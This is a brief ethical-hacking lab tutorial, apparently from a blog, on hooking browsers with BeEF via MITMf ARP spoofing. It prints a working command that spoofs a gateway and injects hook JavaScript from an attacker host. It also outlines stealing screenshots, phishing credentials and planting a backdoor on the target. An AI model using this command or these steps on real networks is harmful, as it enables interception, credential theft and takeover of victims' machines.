Ethical Hacking - GAINING ACCESS(23)

CLIENT SIDE ATTACK - BeEF Framework

Hooking targets using MITMF

Tools: MITMF and BeEF

Start BeEF and execute the following commands:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hooks

Open any website in the browser on the target machine. You can find injected codes on the source page.

Ethical Hacking - GAINING ACCESS(23)_第1张图片

 

 Open BeEF control panels and find the victim online browsers.

Ethical Hacking - GAINING ACCESS(23)_第2张图片

 Then you can execute the commands to exploit victimized machines.

1. Get screenshots through Spyder Eys.

Ethical Hacking - GAINING ACCESS(23)_第3张图片

 2. Get account name and password through Pretty Theft.

Ethical Hacking - GAINING ACCESS(23)_第4张图片

 

 

 If a victim fills in the prompted login form, you can get username and password.

Ethical Hacking - GAINING ACCESS(23)_第5张图片

 

 3. Gaining full control over Windows Target

Ethical Hacking - GAINING ACCESS(23)_第6张图片

 

Download and install the backdoor file on the target machine, then you can control this computer.

 Ethical Hacking - GAINING ACCESS(23)_第7张图片

 

你可能感兴趣的:(Ethical Hacking - GAINING ACCESS(23))